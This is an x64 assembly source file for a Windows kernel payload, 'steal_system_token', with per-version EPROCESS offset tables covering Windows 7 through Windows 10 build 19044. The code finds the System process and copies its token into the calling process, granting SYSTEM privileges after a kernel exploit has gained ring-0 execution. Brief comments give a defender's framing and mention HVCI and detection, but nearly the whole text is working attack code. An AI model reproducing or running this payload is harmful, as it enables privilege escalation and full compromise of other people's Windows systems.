Petite version ...
;-----------------------------------------------------------------------
; int steal_system_token(void)                    ; x64 kernel-mode payload
; Overwrites the calling process's EPROCESS.Token with the System
; process's token pointer. From a defender's view this is the
; post-exploitation ring-0 write a kernel exploit performs after it has
; already gained code execution; everything here depends on hard-coded,
; version-specific structure offsets (KUSER_SHARED_DATA fields read
; directly, EPROCESS offsets taken from Win_Versions / Win10_builds).
; ABI:   no arguments; assumes ring 0 with gs = KPCR
; Out:   eax = 1 on success, eax = 0 when the running version/build is
;        not covered by the tables (fails closed, nothing is written)
; Clobb: rax, rcx, rdx, r9, r10, flags (nothing is preserved)
; Mitigation/detection (general, not shown by this code): HVCI prevents
; unsigned ring-0 code from running at all; after the fact the swap is
; visible as a non-System process whose Token pointer equals System's.
;-----------------------------------------------------------------------
align 16
steal_system_token:
mov rcx,0xFFFFF780_00000000 ; rcx = nt!KUSER_SHARED_DATA (fixed kernel VA)
lea rdx,[Win_Versions-4] ; rdx = table cursor; the selected pair is read at [rdx+4]/[rdx+6]
mov eax,[rcx+0x26C] ; nt!_KUSER_SHARED_DATA.NtMajorVersion
add eax,[rcx+0x270] ; nt!_KUSER_SHARED_DATA.NtMinorVersion
; eax = major+minor: 6.1 -> 7, 6.2 -> 8, 6.3 -> 9, 10.0 -> 10
cmp eax,7
jz @F ; Windows 7: first Win_Versions pair (cursor already positioned)
jc .fail ; older than 6.1: unsupported
add rdx,4 ; advance cursor to the Windows 8 / 8.1 pair
cmp eax,10
jc @F ; sum is 8 or 9: Windows 8 / 8.1 pair
jnz .fail ; sum above 10: unsupported
; Windows 10: select the pair by build number instead
mov eax,[rcx+0x260] ; nt!_KUSER_SHARED_DATA.NtBuildNumber
.build_scan:
add rdx,8 ; next Win10_builds entry (dd bound + two dw offsets = 8 bytes)
cmp eax,[rdx]
jnc .build_scan ; unsigned compare: keep scanning while build >= entry bound
cmp dword [rdx],-1
jnz @F ; stopped on a real entry: use its offsets
.fail: ; reached the -1 terminator (build newer than the table) or unsupported version
xor eax,eax ; return 0
retn
@@:
movzx r9,word [rdx+4] ; r9 = EPROCESS.ActiveProcessLinks offset
movzx r10,word [rdx+6] ; r10 = EPROCESS.Token offset
mov rax,[gs:0x188h] ; nt!KeGetCurrentThread
mov rcx,[rax+0x220] ; nt!IoThreadToProcess (rcx = current EPROCESS; hard-coded offset, not taken from the tables)
lea rax,[rcx+r9] ; ActiveProcessLinks
; Search for the System process object VA(PID 4)
@@: mov rax,[rax] ; follow Flink to the next process's ActiveProcessLinks
cmp qword [rax-8],4 ; UniqueProcessId sits just before ActiveProcessLinks; 4 = System
jnz @B
sub rax,r9 ; system process object VA
mov rax,[rax+r10] ; rax = System token (EX_FAST_REF)
and al,0xF0 ; keep the pointer bits, drop System's embedded reference-count nibble
mov dl,[rcx+r10] ; dl = low byte of the current process's token
and dl,0x0F ; keep only the current token's reference-count nibble
add al,dl ; System token pointer + current process's refcount bits
mov [rcx+r10],rax ; overwrite the current EPROCESS.Token
push 1
pop rax ; return 1 (short encoding of eax = 1)
retn
; Per-version EPROCESS offsets consumed by steal_system_token.
; Every pair is: dw ActiveProcessLinks offset, dw Token offset.
; Win_Versions is chosen by the major+minor sum (7 -> first pair,
; 8 or 9 -> second pair); Win10_builds is scanned by NtBuildNumber.
Win_Versions:
dw 0x0188,0x0208 ; Windows 7/Windows Server 2008 R2
dw 0x02E8,0x0348 ; Windows 8/Windows Server 2012/Windows 8.1/Windows Server 2012 R2
; unlisted builds that fall between listed ones are assumed to share the
; offsets of the next (higher) listed group
; (migrate bounds as more information becomes available)
; Windows 10 entry layout: dd exclusive upper bound on NtBuildNumber, then
; the pair that applies to every build below that bound and above the
; previous entry's bound. Entries must stay sorted ascending, since the
; scan stops at the first bound the build is below; the 8-byte entry size
; is what the code steps by (`add rdx,8`).
Win10_builds:
; 10240
; 10586
; 14393
dd 14393+1
dw 0x02F0,0x0358
; 15063
; 16299
; 17134
; 17763
dd 17763+1
dw 0x02E8,0x0358
; 18362
; 18363
dd 18363+1
dw 0x02F0,0x0360
; 19041
; 19042
; 19043
; 19044
dd 19044+1
dw 0x0448,0x04B8
dd -1 ; terminator: any build above 19044 stops here and the payload returns 0